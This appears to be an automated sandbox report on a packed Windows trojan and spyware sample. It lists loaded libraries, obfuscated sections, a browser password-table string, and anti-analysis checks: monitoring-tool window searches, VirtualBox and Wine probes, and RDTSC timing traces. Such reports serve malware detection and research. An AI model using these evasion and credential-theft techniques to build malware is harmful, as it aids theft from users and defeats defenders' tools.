            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exe | Static PE information: Section: ZLIB complexity 0.9979611579153606
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
            Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe, 00000000.00000003.1712664344.000000000510C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
            Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
            Source: file.exe | Static file information: File size 2921984 > 1048576
            Source: file.exe | Static PE information: Raw size of aqmxsaio is bigger than: 0x100000 < 0x29e000

            Data Obfuscation

            Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.840000.0.unpack :EW;.rsrc :W;.idata :W;aqmxsaio:EW;zdfqzxlh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;aqmxsaio:EW;zdfqzxlh:EW;.taggant:EW;
            Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
            Source: file.exe | Static PE information: real checksum: 0x2d6c84 should be: 0x2ceab4
            Source: file.exe | Static PE information: section name: (unprintable)
            Source: file.exe | Static PE information: section name: .rsrc
            Source: file.exe | Static PE information: section name: .idata
            Source: file.exe | Static PE information: section name: aqmxsaio
            Source: file.exe | Static PE information: section name: zdfqzxlh
            Source: file.exe | Static PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006F9764 push edi; iretd 0_3_006F9767
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006F7A7B push FFFFFFDBh; iretd 0_3_006F7A8C
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006FAF08 push ebx; ret 0_3_006FAF09
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006F7EF9 push esi; retf 0_3_006F7EFC
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006FA7F8 push esi; retf 0_3_006FA7F9
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_006F83C0 push ebx; retf 0_3_006F83CC
            Source: file.exe | Static PE information: section name: (unprintable) entropy: 7.97730443522952

            Boot Survival

            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
            Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419E1 second address: A419E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419E5 second address: A419FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jc 00007FAD40FD676Ch 0x0000000d mov edi, dword ptr [ebp+1244873Fh] 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A419FF second address: A41A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41A03 second address: A41A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41A09 second address: A41A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FAD40FC0C56h 0x00000009 jmp 00007FAD40FC0C66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 je 00007FAD40FC0C56h 0x0000001b pop ebx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41F1F second address: A41F84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FAD40FD6768h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D3949h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FAD40FD6768h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jno 00007FAD40FD6766h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41F84 second address: A41F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42935 second address: A42939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03679 second address: A03683 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAD40FC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46FD7 second address: A47062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007FAD40FD6766h 0x0000000b jmp 00007FAD40FD6779h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 pushad 0x00000016 mov eax, dword ptr [ebp+122D358Dh] 0x0000001c mov dword ptr [ebp+1246A468h], eax 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FAD40FD6768h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D278Eh], eax 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007FAD40FD6768h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 pop eax 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47062 second address: A4706C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4706C second address: A470A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD40FD677Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FD6771h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A470A1 second address: A470A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A486DA second address: A486E4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47986 second address: A4798C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49225 second address: A49229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49229 second address: A49238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49238 second address: A4923F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A492BE second address: A492C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A492C2 second address: A492C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49E98 second address: A49E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49E9D second address: A49EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FAD40FD6766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD40FD676Dh 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49EBD second address: A49ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49ED2 second address: A49EDC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A693 second address: A4A69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CF93 second address: A4CFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 add di, 10D2h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FAD40FD6768h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FAD40FD6771h 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CFD6 second address: A4CFF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CFF2 second address: A4CFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D10B second address: A4D11F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007FAD40FC0C56h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1A3 second address: A4E1AD instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD40FD676Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D11F second address: A4D125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F17F second address: A4F196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD40FD6766h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FAD40FD6770h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D125 second address: A4D129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1AD second address: A4E1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD40FD676Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501AF second address: A501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E1C5 second address: A4E1CF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F293 second address: A4F2A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FAD40FC0C56h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F2A5 second address: A4F2AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A513B8 second address: A513C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F2AF second address: A4F2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A523DD second address: A523E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51529 second address: A51533 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51533 second address: A5153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5153D second address: A515E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAD40FD6768h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, 8921h 0x0000002c push edx 0x0000002d mov ebx, dword ptr [ebp+122D3CCEh] 0x00000033 pop edi 0x00000034 push dword ptr fs:[00000000h] 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FAD40FD6768h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov bl, E4h 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e mov ebx, dword ptr [ebp+122D31BBh] 0x00000064 mov eax, dword ptr [ebp+122D1439h] 0x0000006a js 00007FAD40FD676Ah 0x00000070 mov di, AA62h 0x00000074 push FFFFFFFFh 0x00000076 mov dword ptr [ebp+122D2933h], edi 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FAD40FD6770h 0x00000084 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525A8 second address: A525AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525AD second address: A525C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAD40FD6771h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A525C8 second address: A5265F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+1247119Eh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FAD40FC0C58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov bh, 3Ah 0x00000033 xor bl, FFFFFFF1h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D01F5h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FAD40FC0C58h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d push FFFFFFFFh 0x0000005f mov bx, si 0x00000062 nop 0x00000063 jmp 00007FAD40FC0C62h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5265F second address: A52666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53783 second address: A53789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A55671 second address: A556A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAD40FD6772h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FAD40FD6775h 0x00000015 pop ecx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A556A4 second address: A55702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAD40FC0C56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sub edi, 6111E4F5h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FAD40FC0C58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 movsx edi, ax 0x00000034 mov edi, dword ptr [ebp+122D1CC6h] 0x0000003a push 00000000h 0x0000003c mov edi, eax 0x0000003e xchg eax, esi 0x0000003f push esi 0x00000040 jnc 00007FAD40FC0C58h 0x00000046 pop esi 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b ja 00007FAD40FC0C56h 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5673F second address: A56743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56743 second address: A5679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAD40FC0C69h 0x0000000e pushad 0x0000000f jmp 00007FAD40FC0C5Ch 0x00000014 jng 00007FAD40FC0C56h 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d sbb bl, 0000006Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAD40FC0C5Fh 0x00000027 push 00000000h 0x00000029 sub dword ptr [ebp+122D1E60h], eax 0x0000002f push eax 0x00000030 pushad 0x00000031 pushad 0x00000032 push edi 0x00000033 pop edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5885D second address: A5886A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56959 second address: A56972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAD40FC0C5Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A81F second address: A5A824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A824 second address: A5A843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A843 second address: A5A847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A847 second address: A5A84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5A84B second address: A5A851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7FB second address: A5C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7FF second address: A5C812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD40FD676Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C812 second address: A5C81E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
